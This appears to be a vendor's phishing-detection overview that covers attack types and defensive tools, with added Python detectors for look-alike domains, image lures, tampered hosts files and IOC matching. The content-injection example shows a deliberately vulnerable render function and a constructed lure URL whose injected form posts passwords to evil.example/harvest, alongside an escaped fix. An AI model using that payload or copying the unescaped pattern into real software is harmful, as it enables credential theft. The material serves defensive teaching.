Frequently used as the initial attack vector to breach an organization’s network, phishing continues to rank as a top threat. From Business Email Compromise (BEC), to social engineering, to good old fashioned email, this article serves to provide a broad overview of phishing detection, including the different types of phishing attacks, the tools and tactics threat actors employ to construct and execute their phishing attacks, and the solutions that organizations can use to defend against these attacks. By gaining a better understanding of the anatomy of a phishing attack, organizations can learn to maximize their phishing detection capabilities to ensure they are able to defend against a myriad of different attacks.
What is Phishing?
Phishing is a type of cyber attack in which threat actors attempt to deceive users into revealing sensitive personal information like passwords, credit card or banking information, or other personal information that can be weaponized in subsequent attacks. While threat actors use a wide array of tools and tactics in constructing their phishing campaigns, there are three primary methods used for stealing information:
- Malicious links that lead to impostor websites, which harvest credentials or serve malware.
- Malicious file attachments that are infected with malware to compromise a user’s computer and/or files.
- Fraudulent data entry forms that prompt users to fill in login credentials or other sensitive information like credit card data, banking details, phone numbers, etc.
Phishing as a Service
Traditionally, phishing attacks were exclusive to the more tech savvy and skilled cybercriminals, requiring in-depth knowledge of coding, scripting, social engineering, and other techniques. However, over the last several years, we have witnessed the evolution of Phishing-as-a-Service (PaaS) which essentially removes those technical barriers by offering ready-made templates and user-friendly interfaces to simplify the entire process into a point-and-click operation.
Phishing as a Service represents the commoditization and democratization of phishing tools, transforming them from specialized instruments into commercial products. These are no longer hidden in the shadows but are openly available for purchase or rent, sometimes even in legal and accessible markets. The unprecedented ease of access to these tools means that aspiring cybercriminals, without the need to master coding or network infiltration, can launch effective phishing attacks. PaaS platforms provide pre-made phishing campaigns that can be easily customized and deployed by anyone willing to engage in cyber fraud. These platforms may come with customer support, tutorials, and updates, making it all the more accessible to the masses. The transformation is akin to turning a specialist’s toolkit into a consumer product, and its implications are as profound as they are concerning.
Types of Phishing Attacks
In its original and most common form, the attack is initiated via an email purporting to be from a reputable or legitimate source, enticing the victim to react by clicking a link to a fraudulent page used for credential harvesting. As is the case with all cyber threats, these attacks have evolved and adapted to take advantage of the latest advances in technology to compromise more victims as well as to evade phishing detection. Understanding the different types of attacks is crucial to ensuring any phishing detection solutions put in place will have the capability to identify each of the different types of attacks. Below is a range of different attack types that we see in the threat landscape.
Angler Phishing. Angler phishing is a phishing attack that targets victims through social media by impersonating customer service or support agents. Attackers create fake social media accounts for top brands to trick dissatisfied customers into revealing personal information when they are redirected from social media sites to phishing sites, and asked to complete tasks that compromise their personal information. Financial institutions are often targeted in this type of attack.
Business Email Compromise (BEC). BEC is a highly targeted spear phishing attack that relies on name recognition and authority to get the victim to carry out a request. It typically begins with the compromise or spoofing of an email account belonging to an executive with financial authority, such as the CEO or CFO, after which the attacker sends requests for wire payments to accounts they control. Common variants involve compromised vendor accounts (invoice fraud), requests for employee W-2 information, and requests for bulk gift card purchases. Because BEC messages usually carry no link or attachment, link- and attachment-centric phishing detection misses them; sender and reply-to mismatches, look-alike sender domains, and out-of-band verification of payment changes are the practical controls.
Clone Phishing. Clone phishing is an email-based attack in which attackers copy a legitimate email the victim has already received (or is expecting) and resend it with the original links or attachments swapped for malicious ones, often framed as an updated or corrected version. Because the message mirrors genuine correspondence and is frequently sent from a compromised account or a look-alike address rather than a crudely spoofed one, basic filters keyed on sender reputation or spoofing indicators can miss it.
Content Injection. Also called content spoofing, text injection, or virtual defacement, content injection exploits an injection vulnerability in a legitimate web application: a parameter that is reflected into the page without encoding lets the attacker craft a link under the trusted domain whose page displays attacker-supplied text, such as a fake support notice or a login form. Because the URL really does belong to the legitimate site, the user has no reason to doubt what it shows. Content injection therefore exploits both the user's trust and a code-level flaw, and it is a common component of social engineering lures.
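The vulnerable pattern beside its fix, as an added example that is not from the original article: a hypothetical notice page on bank.example echoes a `msg` query parameter into its HTML. The unescaped version lets a link on the legitimate domain render an attacker's form; the hardened version treats the parameter as data. The template, function names and the attacker URL are all constructed for illustration.

```python
import html
from urllib.parse import parse_qs, urlparse

# Hypothetical page template: the site echoes a status message into its markup.
TEMPLATE = "<html><body><h1>Account notice</h1><p>{message}</p></body></html>"


def message_param(url: str) -> str:
    """Extract the ?msg= query parameter exactly as the server would receive it."""
    return parse_qs(urlparse(url).query).get("msg", [""])[0]


def render_notice_vulnerable(url: str) -> str:
    """Reflects the parameter verbatim. Any link on the *legitimate* domain can
    now make the page display attacker-authored markup."""
    return TEMPLATE.format(message=message_param(url))


def render_notice_hardened(url: str, max_len: int = 200) -> str:
    """Treats the parameter as data: length-capped and HTML-escaped (quotes
    included), so injected tags render as literal text instead of markup."""
    safe = html.escape(message_param(url)[:max_len], quote=True)
    return TEMPLATE.format(message=safe)


def injected_markup_survives(rendered: str, marker: str = "<form") -> bool:
    """Detection-style check: does live attacker markup appear in the output?"""
    return marker in rendered


# Constructed lure: the host is the victim's own trusted site; only the query differs.
ATTACK_URL = (
    "https://bank.example/notice?msg="
    "Your session has expired.<form action='https://evil.example/harvest'>"
    "<input name='pw' type='password'><input type='submit' value='Sign in again'></form>"
)

if __name__ == "__main__":
    print(render_notice_vulnerable(ATTACK_URL))
    print(render_notice_hardened(ATTACK_URL))
```

The hardened output still shows the attacker's text, but as inert characters inside the paragraph. In a real application the fix belongs in the templating layer (auto-escaping on by default) rather than at individual call sites, and a Content-Security-Policy that disallows form submissions to foreign origins (`form-action 'self'`) limits the damage if one site is missed.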
Domain Spoofing. Domain spoofing, also known as website spoofing, is a type of phishing where an attacker replicates a legitimate organization's domain. They may register false domain names that appear to be legitimate or slightly alter legitimate domain names to trick users. Common variants are typosquats (paypa1, micros0ft), Unicode/IDN homoglyphs that render identically to the real name, and the real brand placed in a subdomain of an unrelated domain (brand.com.example.net). Attackers often use logos, branding, and visual designs taken from the legitimate site to build the spoofed website, which then harvests sensitive data from victims who believe they are on the real one.
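A look-alike domain checker covering the three variants named above, as an added example that is not part of the original article. It folds each registrable domain through IDN decoding, Unicode normalisation and a small confusable map, then compares it with a list of protected brands by equality, containment and edit distance, and separately checks for a brand name sitting in a subdomain. The protected-brand list, the confusable table (a tiny subset of the Unicode confusables data) and the sample hostnames are constructed; the two-label "registrable domain" rule is a simplification of a public-suffix lookup.

```python
import unicodedata

# Constructed list of brands to protect; a deployment supplies its own.
PROTECTED = ("paypal.com", "microsoft.com", "zvelo.com")

# Illustrative confusables: digit swaps plus a few Cyrillic/Latin look-alikes.
# Not the full Unicode confusables table.
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "8": "b",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u0131": "i",
})


def registrable_domain(host: str) -> str:
    """Last two labels. Real code should consult the public-suffix list."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def to_unicode(label: str) -> str:
    """Decode a punycode label (xn--...) so homoglyphs become visible for folding."""
    try:
        return label.encode("ascii").decode("idna")
    except (UnicodeError, ValueError):
        return label  # already Unicode, or not valid punycode


def fold(label: str) -> str:
    """Lower-case, strip accents, map confusables to ASCII, drop hyphens."""
    s = unicodedata.normalize("NFKD", to_unicode(label).lower())
    s = "".join(ch for ch in s if not unicodedata.combining(ch))
    return s.translate(CONFUSABLES).replace("-", "")


def edit_distance(a: str, b: str) -> int:
    """Damerau-Levenshtein (optimal string alignment): one transposition = 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(host: str) -> tuple:
    """Return (verdict, matched_brand). Verdicts: legitimate, homoglyph,
    brand_in_name, typosquat, brand_in_subdomain, unrelated."""
    host = host.lower().rstrip(".")
    reg = registrable_domain(host)
    if reg in PROTECTED:
        return "legitimate", reg
    reg_name = reg.rsplit(".", 1)[0]
    folded = fold(reg_name)
    subdomain_labels = host.split(".")[:-2]
    for brand in PROTECTED:
        brand_name = brand.rsplit(".", 1)[0]
        if folded == brand_name:
            return "homoglyph", brand
        if brand_name in folded:
            return "brand_in_name", brand
        if len(brand_name) >= 5 and edit_distance(folded, brand_name) <= 1:
            return "typosquat", brand
        if brand_name in subdomain_labels:
            return "brand_in_subdomain", brand
    return "unrelated", None


if __name__ == "__main__":
    for h in ("www.zvelo.com", "paypa1.com", "paypai.com", "micros0ft-login.com",
              "paypal.com.evil.example", "example.org"):
        print(h, "->", classify(h))
```

Run this against newly observed domains from certificate transparency logs or passive DNS rather than against inbound mail alone: a look-alike that has just obtained a certificate is a strong early signal, often before the first lure is sent.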
Evil-Twin Wi-Fi. In an evil-twin attack a threat actor stands up a rogue Wi-Fi access point broadcasting the same network name as a legitimate one, so that users connect through the attacker's equipment rather than the real access point. Sitting in the path, the attacker can observe and alter unencrypted traffic, present a fake captive-portal login page, or answer DNS queries with the addresses of phishing sites. An evil twin can be created with commodity software on a laptop or smartphone. These attacks are prevalent on open public Wi-Fi networks in coffee shops, airports, libraries and the like. Properly validated TLS still protects the content of HTTPS sessions, so in practice the harvest is whatever users type into the attacker's portal pages plus any traffic sent in the clear.
HTTPS Phishing. Sites using HTTPS rather than HTTP were once assumed to be generally safe, and phishing detection tools could treat the presence of TLS as a trust signal. That is no longer the case: more than half of phishing sites have been observed using HTTPS, now that certificates are free and automatically issued. The padlock only means the connection to the site in the address bar is encrypted; it says nothing about whether that site is who it claims to be. Several attack patterns are grouped under HTTPS phishing, the most common of which are listed below.
- Man-in-the-Middle (MiTM) is where an attacker inserts themselves into the communication between two parties while the data is en route. The attacker then impersonates one or both parties to intercept sensitive and confidential information before relaying it on to the intended destination. Though the attacker can alter or inject traffic, they typically relay most of it unaltered so as not to be detected.
- SSL Stripping is a type of MiTM attack where the attacker intercepts the user's initial plain-HTTP request and keeps the victim on an unencrypted HTTP connection while speaking HTTPS to the real site, exposing the user's traffic to eavesdropping and tampering. HTTP Strict Transport Security (HSTS), particularly with preloading, prevents the browser from ever issuing that first plaintext request.
- Wildcard Certificate attacks are when threat actors obtain a wildcard certificate, either by stealing its private key or by deceiving a certificate authority into issuing one to a fake company. Once an attacker holds such a certificate, it can be used to impersonate any subdomain of the legitimate domain with a valid padlock.
Image Phishing. Image phishing is an email phishing technique in which the lure text is rendered as an image rather than as text, so that filters scanning for suspicious keywords have nothing to read. Obfuscation of the image itself (stretching, colour changes, compression, added noise) also frustrates detection based on image hashing or OCR. Attackers often store the entire visual content of the email in a single PNG or JPG hosted remotely on a reputable domain such as Wikipedia or Google, so that the image URL passes reputation checks, and wrap the image in a link to the phishing page. A practical detection signal is therefore an HTML body with almost no visible text, one large remote image, and a link around it.
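The detection signal just described, implemented over raw MIME with the standard library, as an added example that is not code from the original article. It inventories the visible text, image sources and link targets of an HTML body and flags the image-phishing shape: a remotely hosted image, a link, and almost no readable text. Both messages and the 40-character threshold are constructed for illustration.

```python
import email
import re
from email import policy
from html.parser import HTMLParser


class _Inventory(HTMLParser):
    """Collect visible text, <img src> values and <a href> targets from HTML."""

    def __init__(self) -> None:
        super().__init__()
        self.text: list[str] = []
        self.images: list[str] = []
        self.links: list[str] = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "img" and a.get("src"):
            self.images.append(a["src"])
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])

    def handle_data(self, data):
        if data.strip():
            self.text.append(data.strip())


def analyse(raw: bytes, min_text_chars: int = 40) -> dict:
    """Return the inventory plus a verdict. An HTML body with fewer than
    min_text_chars of readable text, a remotely hosted image and a link is the
    image-phishing shape. The threshold is illustrative, not tuned."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    inv = _Inventory()
    visible = ""
    if body is not None:
        content = body.get_content()
        if body.get_content_type() == "text/html":
            inv.feed(content)
            visible = " ".join(inv.text)
        else:
            visible = content
    remote_images = [s for s in inv.images if re.match(r"https?://", s, re.I)]
    return {
        "subject": msg["subject"],
        "text_chars": len(visible),
        "remote_images": remote_images,
        "links": inv.links,
        "suspicious": bool(remote_images) and bool(inv.links) and len(visible) < min_text_chars,
    }


# Constructed lure: the whole "message" is one remote image wrapped in a link.
SAMPLE = b"""\
From: "IT Support" <support@helpdesk-notice.example>
To: victim@example.com
Subject: Action required: mailbox quota exceeded
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<a href="https://account-verify.example/?u=victim">
<img src="https://img-cdn.example.net/quota-notice.png" width="600" height="400" alt="">
</a>
</body></html>
"""

# Constructed benign newsletter: real text, a logo image, an unsubscribe link.
BENIGN = b"""\
From: newsletter@example.com
To: victim@example.com
Subject: Monthly update
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body><p>Hello, here is this month's summary of account activity and
upcoming maintenance windows. No action is required on your part.</p>
<img src="https://cdn.example.com/logo.png" alt="logo">
<p><a href="https://example.com/unsubscribe">Unsubscribe</a></p></body></html>
"""

if __name__ == "__main__":
    for raw in (SAMPLE, BENIGN):
        print(analyse(raw))
```

In a mail pipeline this check is cheap enough to run on every message; messages it flags are candidates for OCR of the fetched image and for URL reputation lookups on the wrapped link, which is where the page's reference to full-path URL intelligence applies.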
Pharming. Pharming is a type of phishing attack that redirects web traffic to a location or website different from the one the user intended. Attackers can alter the hosts file on a victim's computer or exploit a weakness in DNS software or resolver configuration, enabling them to reroute requests. Attackers can also compromise DNS servers or registrar accounts, which lets them override DNS records and send all users of a domain to an unintended site. Because the browser shows the correct URL throughout, pharming defeats the usual advice to check the address bar; on HTTPS sites a certificate warning is often the only visible sign.
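A hosts-file audit for the first pharming variant above, as an added example that is not from the original article. It parses hosts-file syntax (address, one or more names, optional `#` comment), then flags any entry for a watched domain, distinguishing a redirect to a foreign address (classic pharming) from a sinkhole to loopback (commonly used by malware to block security updates or legitimate sign-in). The watched-domain list and the tampered hosts content are constructed for illustration.

```python
import ipaddress

# Constructed: domains the organisation cares about. A real list comes from the
# asset inventory plus the identity providers and SaaS the business depends on.
WATCHED = {"bank.example", "login.microsoftonline.com", "accounts.google.com"}
# Addresses a hosts entry may legitimately point to (loopback / null sinkholes).
LOCAL_NETS = [ipaddress.ip_network(n) for n in ("127.0.0.0/8", "::1/128", "0.0.0.0/32")]


def parse_hosts(text: str) -> list:
    """Return (ip, hostname, line_no) for every mapping; comments and blanks skipped."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # first field is not an address: malformed line, skip
        for name in fields[1:]:
            entries.append((fields[0], name.lower().rstrip("."), line_no))
    return entries


def watched_parent(name: str):
    """The watched domain this name equals or sits under, else None."""
    for w in WATCHED:
        if name == w or name.endswith("." + w):
            return w
    return None


def suspicious_entries(text: str) -> list:
    """Every hosts mapping that touches a watched domain, with a reason."""
    findings = []
    for ip, name, line_no in parse_hosts(text):
        if watched_parent(name) is None:
            continue
        addr = ipaddress.ip_address(ip)
        if any(addr in net for net in LOCAL_NETS):
            reason = "watched domain sinkholed to a local address (blocks the legitimate service)"
        else:
            reason = "watched domain pinned to a non-local address (pharming)"
        findings.append({"line": line_no, "host": name, "ip": ip, "reason": reason})
    return findings


# Constructed sample of a tampered hosts file.
SAMPLE_HOSTS = """\
# Static table lookup for hostnames.
127.0.0.1       localhost
::1             localhost ip6-localhost
192.168.1.10    printer.lan
203.0.113.45    bank.example www.bank.example      # added by the attacker
127.0.0.1       login.microsoftonline.com          # blocks real sign-in
"""

if __name__ == "__main__":
    for f in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {f['line']}: {f['host']} -> {f['ip']}: {f['reason']}")
```

Feed it the contents of `/etc/hosts` on Linux and macOS or `%SystemRoot%\System32\drivers\etc\hosts` on Windows. The other pharming paths (tampered resolver settings, poisoned or hijacked DNS) are invisible here; for those, compare what the endpoint resolves against a known-good resolver, and treat unexpected certificate errors on watched domains as a signal rather than something to click through.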
Pop-Up Phishing. Pop-up phishing is when users are browsing the web and a fraudulent pop up message appears, informing them that their device has been infected by a virus. These pop-up ads use scare tactics to trick users into installing malware on their computers, calling fake support numbers, or purchasing antivirus protection that they may not need.
Search Engine Phishing. Search engine phishing, also known as SEO poisoning or SEO Trojans, is a type of phishing attack where threat actors manipulate search engine rankings so that their page appears among the top results for a query a victim is likely to make, such as a software download or a bank's login page. Users who click the result land on the attacker's site, which is designed to steal their personal information or deliver malware.
Smishing. Short for SMS phishing, smishing occurs when the attacker tricks the user into clicking a link, disclosing sensitive information, or downloading a trojan, virus, or other piece of malware using the text (SMS) features of their cellular phone or mobile device.
Social Engineering. Social engineering attacks are a type of cybercrime that use psychological manipulation to trick people into giving away sensitive information or doing things that might not be in their best interests, including providing access to computers or systems that hold that information. The creation of fake accounts on social media platforms, targeted phishing attacks, and telephone/ransom scams are all examples of social engineering at work.
Social Media Phishing. Social media phishing is where attackers gather their victims’ personal information from various social media accounts to then sell on the dark web or gain unauthorized access to financial accounts. The attackers may also use this information for credential phishing purposes. By collecting personal details — birthday, middle name, mother’s maiden name, etc. — and making educated guesses about the financial institutions you use, attackers might be able to reset your password and gain access to your accounts.
Spear Phishing. Spear phishing is a targeted attack in which a threat actor sends fraudulent messages purporting to be from a reputable and trustworthy source to a particular individual or organization, using details gathered about the target to make the lure convincing and deceive them into revealing sensitive information or granting access.
Tabnabbing. Tabnabbing is a phishing technique that abuses a browser tab the user has stopped paying attention to. A page left open in the background rewrites its own title, favicon and content to look like the login page of a service the user is likely to have been signed out of, so that when the user returns to the tab they re-enter their credentials. In the related reverse tabnabbing variant, a page opened through a link with target=_blank uses window.opener to navigate the original tab to a phishing page. Modern browsers treat target=_blank links as rel="noopener" by default, which closes off the reverse variant; the original variant is defeated by checking the address bar before re-authenticating in a tab you did not just open.
Vishing. Vishing is the equivalent of a phishing attack conducted over the telephone or a VoIP (Voice over Internet Protocol) network, in an attempt to scam a victim into revealing personal details used for identity theft, credit card fraud, and more.
Watering Hole. In a watering hole attack, a threat actor compromises a specific website or group of websites likely to be visited by a particular group of individuals with the goal of infecting the visitors’ computers with malware.
Whaling. Whaling is a targeted phishing attack in which the attacker poses as an executive or senior official in order to deceive senior members of another (or the same) organization into transferring money, disclosing sensitive information, or granting access to computer systems.
Phishing Detection Based On Attack Topologies
Detecting the different types of phishing attacks can be quite challenging because phishing threats are not homogeneous in nature. Malicious actors use several different phishing attack topologies to execute their campaigns, each of which requires a different phishing detection approach to mitigate the threat.
Typically, phishing attacks are architected in one of the following three ways:
- Domain-Based. The malicious actor sets up their own domain and website to launch their attack. In this case, the actor registers the domain, deploys a web server, and then hosts the web page or pages needed to carry out the phishing attack.
- Compromised-Site Based. The malicious actor compromises an existing legitimate website and inserts a phishing page within it without the site owner's knowledge.
- Unmonitored-Sites Based. Sites that allow user content to be hosted or uploaded can also serve as a place for phishing pages to be hosted. For example, cloud storage, blogging sites, web application hosting sites, etc., are often used to carry out phishing attacks.
Phishing detection across these three different phishing attack topologies requires a solution that can be tailored for each scenario, as there are different signals to consider for each type of attack. In order to block phishing attacks before an attacker is able to gain a foothold in the network, defenders must be able to detect phishing threats as soon as possible from the point at which the threats become active. The same techniques that can ferret out malicious domains owned by the attacker will not have the same level of effectiveness if the attacker is using legitimate websites to host their phishing pages.
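A small triage routine for the three topologies, as an added example that is not from the original article. Given a URL it decides which topology fits, which signals are worth weighing, and at what granularity a block is safe: an attacker-registered domain can be blocked outright, while a compromised site or a tenant on a user-content platform must be blocked at the full-path URL to avoid taking down the legitimate host. The platform suffix list is a short illustrative set of well-known user-content hosts, the brand keywords and CMS path hints are constructed, and the heuristics are deliberately simple; a production classifier would add registration age, certificate history and content signals.

```python
from urllib.parse import urlparse

# Illustrative, not exhaustive: suffixes of well-known platforms that host
# arbitrary user content. Anything under these is an "unmonitored site".
USER_CONTENT_SUFFIXES = ("github.io", "blogspot.com", "sites.google.com", "sharepoint.com",
                         "web.app", "pages.dev", "amazonaws.com", "blob.core.windows.net")
# Constructed brand keywords; a deployment uses its own protected-brand list.
BRAND_KEYWORDS = ("paypal", "microsoft", "office365", "dhl", "zvelo")
# Path fragments typical of a CMS install that has had a page dropped into it.
CMS_PATH_HINTS = {"wp-content", "wp-includes", "wp-admin", "uploads", "cgi-bin", ".well-known"}

DOMAIN_SIGNALS = ["registration age and registrar", "nameservers and hosting ASN",
                  "certificate issuance in CT logs", "brand keyword or look-alike in the domain"]


def registrable(host: str) -> str:
    """Last two labels; real code should consult the public-suffix list."""
    return ".".join(host.split(".")[-2:])


def topology(url: str) -> dict:
    """Classify a phishing URL as unmonitored-site, domain-based or compromised-site
    and say where a block is safe and which signals to weigh."""
    u = urlparse(url)
    host = (u.hostname or "").lower().rstrip(".")
    path = [p for p in u.path.split("/") if p]

    if any(host == s or host.endswith("." + s) for s in USER_CONTENT_SUFFIXES):
        return {"topology": "unmonitored-site", "block_at": "full-path URL",
                "signals": ["tenant or account name in host or path",
                            "page content and brand-kit reuse",
                            "abuse report to the platform for takedown"]}

    reg = registrable(host)
    if any(b in reg.replace("-", "") for b in BRAND_KEYWORDS):
        return {"topology": "domain-based", "block_at": "registrable domain",
                "signals": DOMAIN_SIGNALS}

    if len(path) >= 2 or any(p in CMS_PATH_HINTS for p in path):
        return {"topology": "compromised-site", "block_at": "full-path URL",
                "signals": ["deep or CMS-specific path on an established domain",
                            "page content unrelated to the rest of the site",
                            "notification to the site owner"]}

    # No brand in the name and a shallow path: most likely an attacker-owned
    # throwaway domain; domain-level signals decide.
    return {"topology": "domain-based", "block_at": "registrable domain",
            "signals": DOMAIN_SIGNALS[:3]}


if __name__ == "__main__":
    # Constructed sample URLs, one per topology plus the fallback case.
    for url in ("https://paypal-secure-login.example/verify",
                "https://smallbakery.example/wp-content/uploads/2023/office365/index.html",
                "https://phish-demo.github.io/microsoft/",
                "https://cdn-update.example/"):
        t = topology(url)
        print(f"{url}\n  {t['topology']}, block at {t['block_at']}")
```

The value of the split shows up in the blocking decision: a domain-level verdict on smallbakery.example would cut off a legitimate business, and a domain-level verdict on github.io would cut off everyone on the platform, which is why the page's later sections stress full-path URL coverage.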
Tools for Phishing Detection
Different solutions will detect phishing threats at various points of an attack. The closer the phishing detection capability sits to the first click, the higher your chances of avoiding an attack, so it is imperative to build your cybersecurity defense strategy with as many defensive layers as possible. Below are some of the most common tools used for phishing detection. Because phishing detection often necessitates the inclusion of malware detection, the list of tools commonly deployed to protect networks against phishing attacks is much the same as that used for malware detection.
DNS Filtering. DNS filtering sits in the resolution path between end users and the internet, so every lookup is an opportunity to refuse to resolve domains classified as malicious, phishing, or non-sanctioned (objectionable). It is provided by ISPs, cable and telco service providers, and by SASE vendors targeting enterprise and mid-market customers. Its granularity is the domain: it cannot block a single phishing page on an otherwise legitimate compromised site, or a single account on a shared cloud-storage or blogging platform, without blocking the whole domain, so it works best alongside URL-level filtering.
Firewalls. Firewalls remain a foundational layer. Traditional port and address rules limit an attacker's inbound options, while next-generation firewalls add URL and category filtering, TLS inspection, and rule- or behaviour-based detections that can block the outbound connection a user makes when clicking a phishing link, and the malware callback that follows a successful lure. Because a phishing victim initiates the connection from inside the network, egress policy matters as much as ingress.
Network Intrusion Detection and Prevention Systems (NIDS/NIPS). Intrusion detection (NIDS) and prevention (NIPS) systems add another layer by applying signature and behaviour-based detection to phishing-related traffic at the network level: connections to known phishing infrastructure, credential posts to newly seen domains, or downloader activity following a click. They also provide the packet- and flow-level detail analysts need to confirm an attack and respond with targeted blocks. With encrypted traffic the usable signals are largely metadata (DNS, SNI, certificate details, destination reputation) unless TLS inspection is in place.
Endpoint Detection and Response (EDR). EDRs provide crucial visibility for network security teams to detect phishing or malicious threats if the attackers manage to evade the other security layers and penetrate the network. EDRs provide host-based detection, investigation and remediation against malware to contain threats before the nefarious actions of an attacker can be fully executed.
Logging. Logging network traffic enables security teams to monitor the network for known Indicators of Compromise (IOCs) and for activity that may indicate phishing, like abnormal network activity, sudden spikes in traffic, or suspicious traffic patterns. Traffic logs can also help identify new IOCs, including malicious URLs, domains, or IPs, and suspicious activity on endpoints, to aid threat hunting. Additionally, logging helps establish the scope of an attack, because it can be used to reconstruct the events leading up to an incident and to list every host that touched the malicious infrastructure.
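IOC matching over proxy logs, as an added example that is not from the original article. It matches each request against three kinds of indicator with the right semantics for each: domain IOCs match the domain and any subdomain, URL IOCs match the full path only (so a phishing page on an otherwise legitimate site does not drag the rest of the site into the alert), and IP IOCs match by CIDR. It then rolls the hits up per client so the scope of exposure is immediate. The log format, the IOC set and every log line are constructed for illustration.

```python
import ipaddress
from urllib.parse import urlparse


def normalise_url(url: str) -> str:
    """scheme://host/path with port, query and fragment dropped, for exact matching."""
    p = urlparse(url)
    return f"{p.scheme}://{(p.hostname or '').lower()}{p.path}"


# Constructed IOC set.
IOC_DOMAINS = {"paypal-secure-login.example", "cdn-update.example"}
IOC_URLS = {normalise_url("https://smallbakery.example/wp-content/uploads/office365/index.html")}
IOC_NETS = [ipaddress.ip_network("203.0.113.0/24")]

# Constructed log format: "<timestamp> <client_ip> <dst_ip> <method> <url>".
LOG = """\
2024-05-02T09:14:03Z 10.0.4.21 93.184.216.34 GET https://www.example.com/
2024-05-02T09:14:09Z 10.0.4.21 203.0.113.45 GET https://paypal-secure-login.example/verify
2024-05-02T09:15:30Z 10.0.4.38 198.51.100.7 GET https://smallbakery.example/wp-content/uploads/office365/index.html
2024-05-02T09:15:31Z 10.0.4.38 198.51.100.7 GET https://smallbakery.example/menu
2024-05-02T09:17:02Z 10.0.4.50 203.0.113.200 CONNECT https://api.cdn-update.example:443/
2024-05-02T09:18:44Z 10.0.4.21 93.184.216.34 GET https://www.example.com/about
"""


def domain_matches(host: str, iocs: set) -> bool:
    """True if host is an IOC domain or any subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in iocs)


def match_line(line: str):
    """Return an alert dict for a line that hits any IOC, else None."""
    ts, client, dst, method, url = line.split(maxsplit=4)
    host = (urlparse(url).hostname or "").lower()
    hits = []
    if domain_matches(host, IOC_DOMAINS):
        hits.append(("domain", host))
    if normalise_url(url) in IOC_URLS:
        hits.append(("url", normalise_url(url)))
    if any(ipaddress.ip_address(dst) in net for net in IOC_NETS):
        hits.append(("ip", dst))
    return {"ts": ts, "client": client, "method": method, "url": url, "hits": hits} if hits else None


def scan(log_text: str):
    """All alerts in order, plus a per-client summary of which IOC kinds they hit."""
    alerts = [m for m in (match_line(l) for l in log_text.splitlines() if l.strip()) if m]
    affected = {}
    for a in alerts:
        affected.setdefault(a["client"], set()).update(kind for kind, _ in a["hits"])
    return alerts, affected


if __name__ == "__main__":
    alerts, affected = scan(LOG)
    for a in alerts:
        print(a["ts"], a["client"], a["url"], a["hits"])
    print("affected clients:", affected)
```

Note that the request to smallbakery.example/menu produces no alert: the URL indicator is path-exact by design, which is the behaviour you want when the phishing page lives on a compromised but otherwise legitimate site. The per-client rollup is the scoping step the paragraph above refers to; in practice it feeds the list of users whose credentials need resetting.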
Education and Awareness. There are a variety of phishing awareness training programs on the market geared towards training employees on recognizing the different attack attempts, and providing guidance on how to respond — or not respond — and report as appropriate. Training courses can be delivered in a classroom setting, online, part of a simulated attack, or a combination of those elements.
Use Cases for Incorporating Phishing Threat Data Into Your Phishing Detection Solutions
- DNS and Web Filtering. Block high-risk or potentially dangerous DNS connections to malicious, phishing, and non-sanctioned content domains. Premium solutions add filtering at the page level and full-path URL, which matters for phishing pages hosted on otherwise legitimate or shared domains.
- Enrich Security Tools. Enrich and automate SIEM, SOAR, and other security platforms with malicious threat intelligence data to improve efficiency and speed of response.
- SWG, FWaaS, CASBs. Secure cloud native environments with full-path URL phishing and malicious datasets to protect users, networks and devices in the modern hybrid workforce.
- SASE. Whether you use a URL database, threat intelligence feeds, or both, having full-path malicious URL visibility and blocking capabilities power maximum protection for SASE security solutions.
- XDR/MDR. Augment in-house threat intelligence ingestion, aggregation and curation with better and faster threat detections to power your XDR/MDR offerings.
- Endpoint Security. Stop threats at the endpoints and IoT devices with premium phishing and malicious URL datasets.
- Browser Security/Remote Browser Isolation. Allow users at any location to safely browse the internet while blocking access to phishing sites.
- Email/SMS Security. Malicious threat prevention for endpoint, email, and text message security.
- Cyber Threat Intelligence. Threat intelligence data on malicious URLs and IOCs enable defenders to block adversaries at the initial access point for comprehensive malicious threat protection.
- Threat Research. Understand the contextual relevance of potential threats with key metadata that map to the malicious threat signals in your environment. Malicious threat intelligence data can be used for research, forensic analysis, historical lookback, and more.
zvelo Phishing Detection and Phishing Threat Intelligence Solutions
zvelo offers a number of different phishing detection solutions that can improve your organization’s defense strategy. The best solution will vary from one organization to the next and depend on the nature of the business, the industry, the type of data involved, cyber risk levels and more. Below are a few options that organizations should consider implementing as countermeasures against social engineering and phishing attacks.
zveloDB is the market’s premium URL classification database and web content categorization service, powering the world’s leading Web Filtering and DNS Filtering, Endpoint Security, Endpoint Detection and Response (EDR), and other security applications.
PhishBlocklist supplies curated phishing cyber threat intelligence for comprehensive protection against active phishing threats in the wild. Provides detections and rich metadata attributes like date detected, targeted brand, and other crucial data points.
PhishScan is a fast, easy-to-implement cloud API query service to get an immediate yes/no response as to whether a URL/IP is phishing. Ideal for email/SMS/surfing applications that require real-time phishing verification lookups.